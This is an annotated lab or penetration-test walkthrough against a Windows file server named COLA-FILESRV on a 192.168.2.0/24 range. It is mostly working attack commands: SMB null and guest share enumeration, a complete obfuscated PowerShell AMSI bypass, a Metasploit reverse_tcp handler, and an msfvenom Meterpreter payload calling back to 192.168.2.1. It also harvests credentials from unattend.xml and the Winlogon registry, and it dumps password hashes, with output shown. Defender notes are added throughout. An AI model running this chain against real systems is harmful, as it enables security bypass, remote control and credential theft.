COLA-FILESRV
# Discovery and SMB share enumeration against the 192.168.2.0/24 lab range.

# Service/version detection (-sV) across the whole /24.
nmap -sV 192.168.2.0/24
# Same scan against the single host 192.168.2.21, with nmap's default script set (-sC) added.
nmap -sV 192.168.2.21 -sC
# List SMB shares on every host using an empty username and empty password (null session).
crackmapexec smb 192.168.2.0/24 -u '' -p '' --shares
# Same listing, authenticating as the built-in Guest account with an empty password.
# The page shows no output; if shares are returned, the host accepts guest SMB logons.
# Defender note: keeping the Guest account disabled and refusing anonymous/guest SMB
# access closes this path. Guest or ANONYMOUS LOGON network logons (Security event 4624,
# logon type 3) and share-access events (5140, when file-share auditing is enabled) are
# the log records to look for.
crackmapexec smb 192.168.2.0/24 -u 'Guest' -p '' --shares
# (the page repeats the previous command verbatim)
crackmapexec smb 192.168.2.0/24 -u 'Guest' -p '' --shares
# Open the "files" share on 192.168.2.21 without supplying a password (-N).
smbclient -N \\\\192.168.2.21\\files
# Obfuscated PowerShell one-liner that disables AMSI scanning for the current PowerShell process.
# With the string concatenation, format operators and backticks resolved, it:
#   1. stores the [Ref] type in a variable named 1q2uZx,
#   2. uses that type's assembly to look up System.Management.Automation.AmsiUtils,
#   3. fetches the field amsiInitFailed with binding flags NonPublic,Static,
#   4. sets that field to $true with a $null instance.
# The obfuscation is presumably there to avoid static signatures on those strings; the page does not say.
# Defender note: PowerShell script block logging (event 4104) records the line as typed, so
# detections should not rely on the literal strings "AmsiUtils" / "amsiInitFailed" alone.
# Heavy backtick and "{n}" -f reordering inside type or member names is itself a useful signal.
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
# Metasploit console transcript: configure exploit/multi/handler to wait for a
# windows/x64/meterpreter/reverse_tcp session calling back to 192.168.2.1.
# LPORT is never set, so the module's default port is used.
# Lines beginning "PAYLOAD =>" / "LHOST =>" are the console echoing the values.
# Defender note: a reverse_tcp payload makes the target open an outbound TCP connection
# to 192.168.2.1. Egress rules and alerting on servers that initiate connections to
# unexpected internal hosts cover this stage.
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.2.1
LHOST => 192.168.2.1
msf5 exploit(multi/handler) > run
# Generate a Meterpreter reverse-TCP payload as a PowerShell script (-f psh), written to
# payload.ps1 and configured to call back to 192.168.2.1.
# NOTE(review): the payload named here is windows/x64/meterpreter_reverse_tcp, while the
# handler on this page is set to windows/x64/meterpreter/reverse_tcp. The page does not
# say which one the lab actually used. Confirm and make the two listings agree.
msfvenom -p windows/x64/meterpreter_reverse_tcp -f psh LHOST=192.168.2.1 -o payload.ps1
# Metasploit post-exploitation module that searches the session's host for Windows
# unattended-install answer files and reports credentials found in them.
# Defender note: answer files left behind after imaging are the root cause. Remove them,
# or strip their password elements, as the last step of deployment.
use post/windows/gather/enum_unattend
# Manual checks for stored credentials and Defender configuration on the Windows host.

# Print the Windows Setup answer file. It can hold deployment credentials such as a local
# administrator or auto-logon password.
type C:\Windows\Panther\unattend.xml
# Read the Winlogon DefaultPassword value, where an auto-logon password is kept in clear
# text when automatic logon has been configured through the registry.
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "DefaultPassword"
# List the folders Microsoft Defender is configured to skip.
# Defender note: keep exclusions minimal and never exclude a directory that
# non-administrative users can write to.
(Get-MpPreference).Exclusionpath
# Meterpreter hashdump output: one local SAM account per line, in the form
#   name:RID:LM hash:NT hash:::
# aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty string (no LM hash stored).
# 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password, so DefaultAccount,
# Guest and WDAGUtilityAccount have no password set.
# Only Administrator (RID 500) and testuser (RID 1000) carry a real password hash here.
# Defender note: treat every hash in a dump like this as a compromised credential and
# rotate it. Unique per-host local administrator passwords (for example via Windows LAPS)
# keep the Administrator hash from being valid on other machines.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5080c59420d5da01b197e2920da4e0a9:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
testuser:1000:aad3b435b51404eeaad3b435b51404ee:64cbb76dcafe2e977794f6251f8231fb:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::